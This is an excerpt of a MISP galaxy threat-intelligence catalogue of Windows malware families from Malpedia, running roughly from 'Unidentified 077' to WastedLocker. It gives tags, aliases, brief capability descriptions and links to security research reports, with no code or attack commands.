The tag is: misp-galaxy:malpedia="Unidentified 077 (Lazarus Downloader)"

Unidentified 077 (Lazarus Downloader) is also known as:

Table 2841. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_077
https://twitter.com/ccxsaber/status/1277064824434745345

Unidentified 078 (Zebrocy Nim Loader?)

Suspected Zebrocy loader written in Nim.

The tag is: misp-galaxy:malpedia="Unidentified 078 (Zebrocy Nim Loader?)"

Unidentified 078 (Zebrocy Nim Loader?) is also known as:

Table 2842. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_078
https://twitter.com/Vishnyak0v/status/1300704689865060353

Unidentified 080

This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. It is also used by attackers to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.

The tag is: misp-galaxy:malpedia="Unidentified 080"

Unidentified 080 is also known as:

Table 2843. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080
https://securelist.com/luckymouse-ndisproxy-driver/87914/

Unidentified 081 (Andariel Ransomware)

Kaspersky Labs observed Andariel to drop this ransomware in one case within a series of attacks carried out against targets in South Korea in April 2021.

The tag is: misp-galaxy:malpedia="Unidentified 081 (Andariel Ransomware)"

Unidentified 081 (Andariel Ransomware) is also known as:

Table 2844. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_081
https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/

Unidentified 082

This is third stage backdoor mentioned in the Kaspersky blog, "Andariel evolves to target South Korea with ransomware". The third stage payload was created via the second stage payload, is interactively executed in the operation and exists in both x64 and x86 versions. Most of them use Internet Explorer or Google Chrome icons and corresponding file names to disguise themselves as legitimate internet browsers. The malware decrypts the embedded payload at runtime. It uses an embedded 16-byte XOR key to decrypt the base64 encoded payload. The decrypted payload is another portable executable file that runs in memory. Before getting decrypted with a hardcoded XOR key, the backdoor also checks for sandbox environment. The backdoor has some code overlap with a know malware family PEBBLEDASH, attributed to Lazarus/LABYRINTH CHOLLIMA.

The tag is: misp-galaxy:malpedia="Unidentified 082"

Unidentified 082 is also known as:

Table 2845. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_082
https://www.brighttalk.com/webcast/18282/493986
https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/

Unidentified 083 (AutoIT Stealer)

The tag is: misp-galaxy:malpedia="Unidentified 083 (AutoIT Stealer)"

Unidentified 083 (AutoIT Stealer) is also known as:

Table 2846. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_083
https://www.intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/

Unidentified 085

A RAT written in .NET, potentially used by Transparent Tribe.

The tag is: misp-galaxy:malpedia="Unidentified 085"

Unidentified 085 is also known as:

Table 2847. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_085
https://blog.cyble.com/2021/09/14/apt-group-targets-indian-defense-officials-through-enhanced-ttps/

Unlock92

The tag is: misp-galaxy:malpedia="Unlock92"

Unlock92 is also known as:

Table 2848. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unlock92
https://twitter.com/struppigel/status/810753660737073153
https://twitter.com/bartblaze/status/976188821078462465

UPAS

The tag is: misp-galaxy:malpedia="UPAS"

UPAS is also known as:

Rombrast

Table 2849. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.upas
https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html
https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/

Upatre

Upatre is primarly a downloader. It has been discovered in 2013 and since that time it has been widely updated. Upatre is responsible for delivering further malware to the victims, in specific upatre was a prolific delivery mechanism for Gameover P2P in 2013-2014 and then for Dyre in 2015.

The tag is: misp-galaxy:malpedia="Upatre"

Upatre is also known as:

Table 2850. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre
https://marcoramilli.com/2020/06/24/is-upatre-downloader-coming-back/
https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/
https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/
https://secrary.com/ReversingMalware/Upatre/

Urausy

The tag is: misp-galaxy:malpedia="Urausy"

Urausy is also known as:

Table 2851. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy

UrlZone

The tag is: misp-galaxy:malpedia="UrlZone"

UrlZone is also known as:

Bebloh
Shiotob

Table 2852. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone
https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware
https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations
https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/
https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/
https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much
https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html
https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0
https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA
https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/
https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features
https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/
https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan
http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf

Uroburos (Windows)

The tag is: misp-galaxy:malpedia="Uroburos (Windows)"

Uroburos (Windows) is also known as:

Snake

Table 2853. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/
https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken
https://www.secureworks.com/research/threat-profiles/iron-hunter
https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation
https://www.circl.lu/pub/tr-25/
https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified
https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence
https://securelist.com/analysis/publications/65545/the-epic-turla-operation/
https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf
https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots
https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg
https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/

USBCulprit

According to Kaspersky, USBCulprit is a malware that is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.

The tag is: misp-galaxy:malpedia="USBCulprit"

USBCulprit is also known as:

Table 2854. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.usbculprit
https://securelist.com/cycldek-bridging-the-air-gap/97157/
https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view

USBferry

The tag is: misp-galaxy:malpedia="USBferry"

USBferry is also known as:

Table 2855. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry
https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-troopers-back-usbferry-attack-targets-air-gapped-environments/
https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf

Vadokrist

ESET reports that Vadokrist is a Latin American banking trojan that they have been tracking since 2018 and that is active almost exclusively in Brazil.

The tag is: misp-galaxy:malpedia="Vadokrist"

Vadokrist is also known as:

Table 2856. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist
https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf
https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/

Vaggen

The tag is: misp-galaxy:malpedia="Vaggen"

Vaggen is also known as:

Table 2857. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vaggen
https://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/

VALUEVAULT

The tag is: misp-galaxy:malpedia="VALUEVAULT"

VALUEVAULT is also known as:

Table 2858. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.valuevault
https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae
https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/

vanillarat

Description:

VanillaRat is an advanced remote administration tool coded in C#. VanillaRat uses the Telepathy TCP networking library, dnlib module reading and writing library, and Costura.Fody dll embedding library. Features:

Remote Desktop Viewer (With remote click)
File Browser (Including downloading, drag and drop uploading, and file opening)
Process Manager
Computer Information
Hardware Usage Information (CPU usage, disk usage, available ram)
Message Box Sender
Text To Speech
Screen Locker
Live Keylogger (Also shows current window)
Website Opener
Application Permission Raiser (Normal -> Admin)
Clipboard Text (Copied text)
Chat (Does not allow for client to close form)
Audio Recorder (Microphone)
Process Killer (Task manager, etc.)
Remote Shell
Startup
Security Blacklist (Drag client into list if you don't want connection. Press del. key on client to remove from list)

The tag is: misp-galaxy:malpedia="vanillarat"

vanillarat is also known as:

Table 2859. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vanillarat
https://github.com/DannyTheSloth/VanillaRAT

Varenyky

In May 2019, ESET researchers observed a spike in ESET telemetry data regarding malware targeting France. After further investigations, they identified malware that distributes various types of spam. One of them is leading to a survey that redirects to a dodgy smartphone promotion while the other is a sextortion campaign. The spam targets the users of Orange S.A., a French ISP.

The tag is: misp-galaxy:malpedia="Varenyky"

Varenyky is also known as:

Table 2860. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky
https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/
https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/

Vawtrak

The tag is: misp-galaxy:malpedia="Vawtrak"

Vawtrak is also known as:

Catch
NeverQuest
grabnew

Table 2861. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf
https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/
https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak
https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
http://thehackernews.com/2017/01/neverquest-fbi-hacker.html
https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/
https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/
https://www.secureworks.com/research/dyre-banking-trojan

VegaLocker

Delphi-based ransomware.

The tag is: misp-galaxy:malpedia="VegaLocker"

VegaLocker is also known as:

Buran
Vega

Table 2862. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker
https://twitter.com/malwrhunterteam/status/1095024267459284992
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/
https://twitter.com/malwrhunterteam/status/1093136163836174339
https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618

Velso

Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension.

The tag is: misp-galaxy:malpedia="Velso"

Velso is also known as:

Table 2863. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.velso
https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/

Venom RAT

The tag is: misp-galaxy:malpedia="Venom RAT"

Venom RAT is also known as:

Table 2864. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.venom
https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html
https://www.cybeseclabs.com/2020/05/07/venom-remote-administration-tool-from-venom-software/
https://blog.malwarelab.pl/posts/venom/

VenomLNK

The tag is: misp-galaxy:malpedia="VenomLNK"

VenomLNK is also known as:

Table 2865. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.venom_lnk
https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/
https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9

Venus Locker

The tag is: misp-galaxy:malpedia="Venus Locker"

Venus Locker is also known as:

Table 2866. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker
https://twitter.com/JaromirHorejsi/status/813690129088937984

Vermilion Strike (Windows)

The tag is: misp-galaxy:malpedia="Vermilion Strike (Windows)"

Vermilion Strike (Windows) is also known as:

Table 2867. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vermilion_strike
https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/

Vermin

The tag is: misp-galaxy:malpedia="Vermin"

Vermin is also known as:

Table 2868. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin
https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/
https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/
https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html

Vflooder

Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect.

The tag is: misp-galaxy:malpedia="Vflooder"

Vflooder is also known as:

Table 2869. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder
https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/

VHD Ransomware

The tag is: misp-galaxy:malpedia="VHD Ransomware"

VHD Ransomware is also known as:

Table 2870. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware
https://securelist.com/apt-trends-report-q2-2020/97937/
https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
https://twitter.com/GrujaRS/status/1241657443282825217
https://seguranca-informatica.pt/secrets-behind-the-lazaruss-vhd-ransomware/

vidar

Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.

The tag is: misp-galaxy:malpedia="vidar"

vidar is also known as:

Table 2871. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed
https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware
https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d
https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/
https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://twitter.com/sisoma2/status/1409816282065743872
https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk
https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html
https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal
https://asec.ahnlab.com/en/22932/
https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/

VIGILANT CLEANER

Wiper malware discovered by Japanese security firm Mitsui Bussan Secure Directions (MBSD), which is assumed to target Japan, the host country of the 2021 Summer Olympics. In addition to targeting common file Office-related files, it specifically targets file types associated with the Japanese word processor Ichitaro.

The tag is: misp-galaxy:malpedia="VIGILANT CLEANER"

VIGILANT CLEANER is also known as:

VIGILANT CHECKER

Table 2872. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner
https://www.mbsd.jp/research/20210721/blog/
https://blog.trendmicro.co.jp/archives/28319
https://therecord.media/wiper-malware-targeting-japanese-pcs-discovered-ahead-of-tokyo-olympics-opening/
https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/
https://www.fortinet.com/blog/threat-research/wiper-malware-riding-tokyo-olympic-games

virdetdoor

The tag is: misp-galaxy:malpedia="virdetdoor"

virdetdoor is also known as:

Table 2873. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor
https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks

Virut

The tag is: misp-galaxy:malpedia="Virut"

Virut is also known as:

Table 2874. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.virut
https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/
https://chrisdietri.ch/post/virut-resurrects/
https://www.secureworks.com/research/virut-encryption-analysis
https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/
https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/
https://www.spamhaus.org/news/article/690/cooperative-efforts-to-shut-down-virut-botnet
https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/

Vizom

The tag is: misp-galaxy:malpedia="Vizom"

Vizom is also known as:

Table 2875. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vizom
https://securityintelligence.com/posts/vizom-malware-targets-brazilian-bank-customers-remote-overlay/

Vjw0rm

VJW0rm (aka Vengeance Justice Worm) is a publicly available, modular JavaScript RAT. Vjw0rm was first released in November 2016 by its primary author, v_B01 (aka Sliemerez), within the prominent DevPoint Arabic-language malware development community. VJW0rm appears to be the JavaScript variant of a series of RATs with identical functionality released by the author throughout late 2016. Other variants include a Visual Basic Script (VBS) based worm titled vw0rm (Vengeance Worm), an AutoHotkey-based tool called vrw0rm (Vengeance Rise Worm), and a PowerShell-based variant called vdw0rm (Vengeance Depth Worm).

The tag is: misp-galaxy:malpedia="Vjw0rm"

Vjw0rm is also known as:

Table 2876. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vjw0rm
https://bazaar.abuse.ch/browse/signature/Vjw0rm/
https://appriver.com/resources/blog/november-2020/vjw0rm-back-new-tactics

VM Zeus

The tag is: misp-galaxy:malpedia="VM Zeus"

VM Zeus is also known as:

VMzeus
Zberp
ZeusVM

Table 2877. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus
https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/
https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/

Vobfus

The tag is: misp-galaxy:malpedia="Vobfus"

Vobfus is also known as:

Beebone

Table 2878. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus
http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html
https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/151/beebone-botnet-takedown-trend-micro-solutions

Void

Ransomware.

The tag is: misp-galaxy:malpedia="Void"

Void is also known as:

VoidCrypt

Table 2879. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.void
https://id-ransomware.blogspot.com/2020/04/void-voidcrypt-ransomware.html
https://securelist.com/cis-ransomware/104452/

Volgmer

The tag is: misp-galaxy:malpedia="Volgmer"

Volgmer is also known as:

FALLCHILL
Manuscrypt

Table 2880. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer
https://www.us-cert.gov/ncas/alerts/TA17-318B
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
https://www.secureworks.com/research/threat-profiles/nickel-academy
https://securelist.com/apt-trends-report-q2-2020/97937/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74
https://securelist.com/operation-applejeus/87553/
https://securelist.com/lazarus-threatneedle/100803/
https://drive.google.com/file/d/1XoGQFEJQ4nFAUXSGwcnTobviQ_ms35mG/view
https://drive.google.com/file/d/1lq0Sjw4FKBxf017Ss7W7uGMvs7CgFzcA/view

Vovalex

Ransomware written in D.

The tag is: misp-galaxy:malpedia="Vovalex"

Vovalex is also known as:

Table 2881. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vovalex
https://twitter.com/VK_Intel/status/1355196321964109824
https://twitter.com/malwrhunterteam/status/1351808079164276736

Vreikstadi

The tag is: misp-galaxy:malpedia="Vreikstadi"

Vreikstadi is also known as:

Table 2882. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi
https://twitter.com/malware_traffic/status/821483557990318080

vSkimmer

The tag is: misp-galaxy:malpedia="vSkimmer"

vSkimmer is also known as:

Table 2883. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer
http://www.xylibox.com/2013/01/vskimmer.html
http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis
https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/

Vulturi

Information stealer.

The tag is: misp-galaxy:malpedia="Vulturi"

Vulturi is also known as:

Table 2884. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.vulturi
https://twitter.com/ViriBack/status/1430604948241276928?s=20

w32times

The tag is: misp-galaxy:malpedia="w32times"

w32times is also known as:

Table 2885. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times
https://attack.mitre.org/wiki/Group/G0022

win.wabot

Wabot is an IRC worm that is written in Delphi.

The tag is: misp-galaxy:malpedia="win.wabot"

win.wabot is also known as:

Table 2886. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wabot
https://blog.talosintelligence.com/2017/03/threat-roundup-0324-0331.html

WallyShack

The tag is: misp-galaxy:malpedia="WallyShack"

WallyShack is also known as:

Table 2887. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wallyshack
https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/

WannaCryptor

The tag is: misp-galaxy:malpedia="WannaCryptor"

WannaCryptor is also known as:

Wana Decrypt0r
WannaCry
Wcry

Table 2888. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor
https://sites.temple.edu/care/ci-rw-attacks/
https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group
https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf
https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58
https://www.microsoft.com/security/blog/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/
https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html
https://dissectingmalwa.re/third-times-the-charm-analysing-wannacry-samples.html
https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html
https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168
https://securelist.com/big-threats-using-code-similarity-part-1/97239/
https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/
https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984
https://metaswan.github.io/posts/Malware-Lazarus-group’s-Brambul-worm-of-the-former-Wannacry-1
https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e
https://www.il-pib.pl/czasopisma/JTIT/2019/1/113.pdf
https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/
https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/
https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/
https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf
https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign
https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/
https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today
http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html
https://www.youtube.com/watch?v=Q90uZS3taG0
https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d
https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf
https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf
http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/

WannaRen

Ransomware.

The tag is: misp-galaxy:malpedia="WannaRen"

WannaRen is also known as:

Table 2889. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wannaren
https://id-ransomware.blogspot.com/2020/03/wannaren-ransomware.html

WastedLocker

WastedLocker is a ransomware detected to be in use since May 2020 by EvilCorp. The ransomware name is derived from the filename that it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, this crypter turned out to be very basic and was used also by other malware families such as: Netwalker, Gozi ISFB v3, ZLoader and Smokeloader. The crypter mainly contains junk code to increase entropy of the sample and hide the actual code.

The tag is: misp-galaxy:malpedia="WastedLocker"

WastedLocker is also known as:

Table 2890. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker
https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html
https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf
https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/
https://ioc.hatenablog.com/entry/2020/08/16/132853
https://blog.talosintelligence.com/2020/07/wastedlocker-emerges.html
https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/
https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware
https://unit42.paloaltonetworks.com/wastedlocker/
https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/
https://areteir.com/wp-content/uploads/2020/07/Ransomware-WastedLocker-1.pdf
https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/
https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.bitdefender.com/files/News/CaseStudies/study/397/Bitdefender-PR-Whitepaper-RIG-creat5362-en-EN.pdf
https://www.bleepingcomputer.com/news/security/insurance-giant-cna-hit-by-new-phoenix-cryptolocker-ransomware/
https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/
https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html
https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/
https://securelist.com/wastedlocker-technical-analysis/97944/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us
https://kc.mcafee.com/corporate/index?page=content&id=KB93302&locale=en_US
https://symantec.broadcom.com/hubfs/SED-Threats-Financial-Sector.pdf
https://medium.com/walmartglobaltech/wastedloader-or-dridexloader-4f47c9b3ae77
http://www.secureworks.com/research/threat-profiles/gold-drake
https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/
